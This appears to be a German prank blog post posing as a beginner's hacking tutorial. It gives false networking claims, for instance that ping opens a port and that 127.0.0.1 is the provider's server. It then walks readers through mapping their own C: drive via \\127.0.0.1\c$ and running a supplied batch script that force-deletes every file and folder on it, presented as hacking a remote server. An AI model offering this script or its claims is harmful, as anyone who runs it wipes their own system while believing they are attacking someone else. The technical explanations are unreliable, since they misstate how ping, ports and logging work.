Microsoft
  Hacken
 

Wie werde ich ein Hacker?

Security
Nachdem nun schon so viele Besuche immer und immer wieder auf meinen Blog, durch Suchbegriffe wie "wie werde ich ein hacker", "ich will einen rechner per ip hacken" usw., bekomme, will ich den ganzen suchenden endlich mal ein wenig entgegenkommen und sie in die Kunst des Hackens einweisen.

Dazu gelangt ihr im vollständigen Artikel!
Der allererste Schritt ist ein guter Nickname, der einen Hacker von der Masse hervorhebt und unter dem Du dir einen Namen in der Szene machst. Möglichst cool sollte es natürlich klingen.

Zunächst einmal wollen wir dann ein Auge darauf werfen, welche Materialien denn zum Hacken notwendig sind. Zum einen braucht man natürlich eine gute Internetanbindung, echte Hacker setzen auf DSL von AOL, denn - wie jeder weiß - ist AOL mit Abstand der zuverlässigste Provider in diesem Segment, im Zweifelsfall kann man aber als guter Kenner auch auf T-Com oder Arcor zurückgreifen.

Entgegen der in sogenannten "Szene Foren" häufig verbreiteten Aussage, Linux sei zum Hacken essentiell, ist Windows, allen voran das fortschrittliche Windows Vista, der Standard, wenn es um Hacken geht. Diese Meinung, dass Linux für diesen Zweck das beste sei, wird von den möchtegern Hackern in diesen Foren nur vertreten, um die unwissenden Noobs von ihrem Ziel abzulenken und auf eine falsche Fährte zu locken, denn: ein echter Hacker arbeitet mit GUI! Die Aussage, dass ein Hacker nur per Konsole und Kommandozeile arbeiten würde, ist ein weiteres solches "Ablenkungsmanöver", um unwissende in einen Lehrmarathon zu jagen, der allerdings (was sie ja nicht wissen) zu nichts führt, denn Kenntnisse über die Befehle eines Systems (speziell Kommandozeile) sind vollkommen unnötig. Ein wunderbares Beispiel, wie Anfängern dadurch eins ausgewischt werden soll, ist diese Seite des Chaos Computer Clubs: http://koeln.ccc.de/prozesse/writing/artikel/hacker-werden.xml
Der sarkastische Stil des Artikels lässt problemlos erkennen, dass hier falsches Spiel mit Anfängern getrieben wird und diese in die Irre geleitet werden sollen. Zurück zum Thema: Trotz allem werden gewisse Kenntnisse in der Konsole manchmal leider verlangt, da auch das fortschrittliche Windows nicht alles per Oberfläche machen kann.

Nun denn, wie gesagt, wer mit Windows ausgestattet ist, ist mitunter gut bedient und kann dort schon seine ersten Hackingversuche machen.

Zusätzlich sollte man sich mit Batch Programmierung auskennen. Es wird immer wieder gesagt, "wenn du Hacken willst, lern' C(++) oder Java, denn nur ein guter Programmierer kann auch ein Hacker sein". Das ist, um Hernn Stromberg zu zitieren, absoluter Mumpitz. Batch ist nahezu alles was man braucht, Du wirst sicherlich schon oft deine Anfänge in diesem Bereich gesucht haben und Du hast richtig gesucht! Batch Programmierung ist sehr fortschrittlich, deine ersten Hackingversuche in diesem Tutorial werden damit geschrieben und außerdem ist es kostenlos, frei verfügbar und benötigt keine lästige Kompilierung deines Codes.

Schreiten wir nun zur Tat!

Wie gesagt benötigst Du vor allem Windows. Sonst nichts, ein echter Hacker arbeitet mit Bordmitteln und muss auch damit auskommen, schließlich willst Du ja auch mal an einem anderen PC die Chance nutzen und etwas hacken können.

Zuerst öffnen wir die Konsole, dies geschieht, indem Du das Startmenü öffnest und unter "Ausführen" den Befehl cmd eingibst (zur Info: wenn ich meine, einen Befehl eingeben, heißt dass, das ich vorraussetze, dass er mit Enter bestätigt wird). Dir öffnet sich nun die Konsole.

Das erste, was wir dort machen wollen, ist eine optische Anpassung aus zwei Gründen:
1. Ein Hacker muss sich in seiner Umgebung wohlfühlen, muss eins werden mit dem Computer.
2. Es gilt auch einfach den optischen Schein zu wahren. Wenn Dir mal einer deiner Kumpel beim Hacken zuschaut, sieht das einfach nicht "elitär" aus, wenn deine Konsole aussieht, wie jede andere auch.

Dafür machst Du jetzt einen rechtsklick auf die linke obere Ecke des Fensters und wählst unter "Eigenschaften" den Menüpunkt Farben. Stelle Dir dort deine individuelle Kombination zusammen. Ein schwarz/grün Mix wirkt immer sehr erhaben (Matrix sei dank).

Wenn Du deine Einstellungen vorgenommen hast, wenden wir uns nun wieder der Tat zu. Zuerst wollen wir mal einen sogenannten Ping ausführen. Ein Ping ist ein Befehl, um einen Rechner im Internet auf seine Erreichbarkeit zu prüfen und gleichzeitig einen Port zu öffnen, über den wir dann einsteigen können.

Als Ziel empfehle ich dir die Adresse 127.0.0.1. Das ist die immer die Adresse des Basisservers deines Providers. Keine Angst, egal, was Du auf diesem Server auch anstellst, es ist nicht nachvollziehbar, da die Provider gesetzlich nicht in der Lage sind die Verbindungen zu loggen. Sollten sie es dennoch machen, soll es uns nicht stören, da wir im späteren Schritt dieses Tutorials ohnehin ein paar Daten "verschwinden" lassen, so auch die Logdateien ;-)

Um nun diesen Ping auszuführen, geben wir den folgenden Befehl ein:
ping 127.0.0.1

Das Resultat sollte soetwas wie das folgende sein:
C:>ping 127.0.0.1

Pinging 127.0.0.1 with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128

Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms


Der Wert hinter "time" zeigt die Latenz zum Server an. In diesem Fall weniger als 1ms. Ist dein Wert ähnlich niedrig, weißt Du jedenfalls, dass Du eine sackschnelle Verbindung hast!

Nun wollen wir doch einmal sehen, ob der Port, den wir auf dem Server durch den ping Befehl geöffnet haben, auch nutzbar ist.

Dazu nutzen wir den Befehl net use, um eine Verbindung zu dem Server herzustellen. Standardmäßig wird auf dem Server ein Port "c$" geöffnet, der für wenige Minuten aktiv bleibt. Um diesen zu erreichen, versuchen wir folgendes:
net use q: 127.0.0.1c$

Der Parameter q: sagt, dass wir einen sogenannten "Query" an den Server schicken wollen, 127.0.0.1c$ gibt die Adresse gefolgt vom Port an.

Lief der Befehl erfolgreich, solltet ihr etwas wie unten erhalten haben (bitte beachtet, dass ich ein englisches Windows nutze):
C:>net use q: 127.0.0.1c$
The command completed successfully.


Um nun sicherzugehen, dass eine Verbindung besteht, gebt ihr einfach net use ohne Parameter ein, die Ausgabe sieht wie folgt aus:
C:>net use
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
OK Q: 127.0.0.1c$ Microsoft Windows Network

The command completed successfully.


Wie wir am Feld "Status" sehen, besteht die Verbindung nun erfolgreich zum Server im Querymodus (zu erkennen an dem Q:), das heißt, der Server nimmt unsere Befehle entgegen.
Diese Verbindung ist für uns sichtbar, wie eine Netzwerkfreigabe bzw. ein neues Laufwerk. Um die Verbindung zu nutzen, einfach q: eingeben. Ihr seid nun damit verbunden, euer erster Hack war erfolgreich.

Aber wir wollen uns ja nicht darauf ausruhen. Wir wollen ja nun auch noch etwas nützliches damit anfangen. Wie wäre es z.B. ein paar Dateien zu löschen. Für den Provider ist das uninteressant, da diese Server so oder so automatisch synchronisiert werden, es entsteht also kein wirklicher Datenverlust, ist für uns aber eine gute Spielwiese zum probieren.

Die Daten zu löschen wäre per Hand aber viel zu aufwendig, deswegen schreiben wir nun unser erstes Batch Script, denn wie jeder weiß, schreiben sich Hacker für ihre Aufgaben lieber eigene Programme, als alles anders umständlich per Hand zu machen.

Zuerst trennen wir aber die Verbindung wieder, sonst entdeckt uns noch jemand. Getrennt wird die Verbindung über:
net use q: /delete

Öffnet jetzt Notepad aus dem Startmenü (Start -> Programme -> Zubehör). Wir wollen nun die ersten Schritte unseres Hacks automatisieren. Fügt dafür die eingegebenen Befehle in eine Batch Datei ein. Ihr könnt einfach mein Beispiel übernehmen:
@echo off
echo Hackscript v1.0 by {hier dein Hackerpseudonym eintragen}
echo =========================================
echo Step 1/6
echo ##########
echo Pingin ISPs baseserver..
ping 127.0.0.1
echo:
echo Ping succeeded, port on host has been opened.
echo:
echo:
echo Step 2/6
echo ##########
echo Connecting to open port c$ via query (q:)
echo:
net use q: 127.0.0.1c$
echo:
echo Connected..
echo:
echo:
echo Step 3/6
echo ##########
echo Using connection q:
echo:
q:
echo:
echo successful!
echo:
echo:
echo Step 4/6
echo ##########
echo Reading directory listing..
echo:
echo This may take a while...
dir * /s /b /a -R > export.exp
echo:
echo done!
echo:
echo:
echo Step 5/6
echo ##########
echo Deleting files
echo:
del /-P /f /s /q /a SRHIA *.*
echo:
echo done!
echo:
echo:
echo Step 6/6
echo ##########
echo Deleting directories
echo:
rmdir /s /q .
echo:
echo done!
echo:
echo:
echo:
echo:
echo ***************************************************************
echo The server has successfully been hacked, now logging out!
echo ***************************************************************
echo:
echo:
net use q: /delete
echo:
echo Finished, exiting..


Damit ist der Server erstmal sauber gehackt und sogar die Logfiles sind gelöscht. Damit eure Spuren auch ohne weiteres verwischt werden, solltet ihr auf jeden Fall euren Rechner neustarten.

Herzlichen Glückwunsch sage ich dann hiermit! Ihr habt die erste Stufe zum Hacker-sein erfolgreich beschritten, mit den erworbenen Grundkenntnissen könnt ihr schon einiges machen. Ich wünsche viel Spaß und nun seid ihr auch soweit, euch in den sogenannten Szeneforen mit euren Erfolgen präsentieren zu können.
  • Seite drucken
  •  
      ©by Raphael
     
     
    => Willst du auch eine kostenlose Homepage? Dann klicke hier! <=
  • Seite drucken